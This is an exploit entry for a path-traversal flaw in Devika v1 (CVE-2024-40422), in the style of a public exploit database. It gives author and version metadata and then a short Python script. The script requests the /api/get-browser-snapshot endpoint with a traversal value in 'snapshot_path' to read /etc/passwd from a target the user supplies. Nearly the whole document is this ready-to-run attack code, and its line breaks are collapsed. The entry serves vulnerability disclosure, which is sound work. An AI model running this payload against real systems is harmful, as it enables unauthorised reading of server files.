Devika 1 Path Traversal

# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter# Google Dork: N/A# Date: 2024-06-29# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/X)# Vendor Homepage: https://devikaai.co/# Software Link: https://github.com/stitionai/devika# Version: v1# Tested on: Windows 11 Home Edition# CVE: CVE-2024-40422#!/usr/bin/pythonimport argparseimport requestsdef exploit(target_url):    url = f'http://{target_url}/api/get-browser-snapshot'    params = {        'snapshot_path': '../../../../etc/passwd'    }    response = requests.get(url, params=params)    print(response.text)if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)    args = parser.parse_args()    exploit(args.target)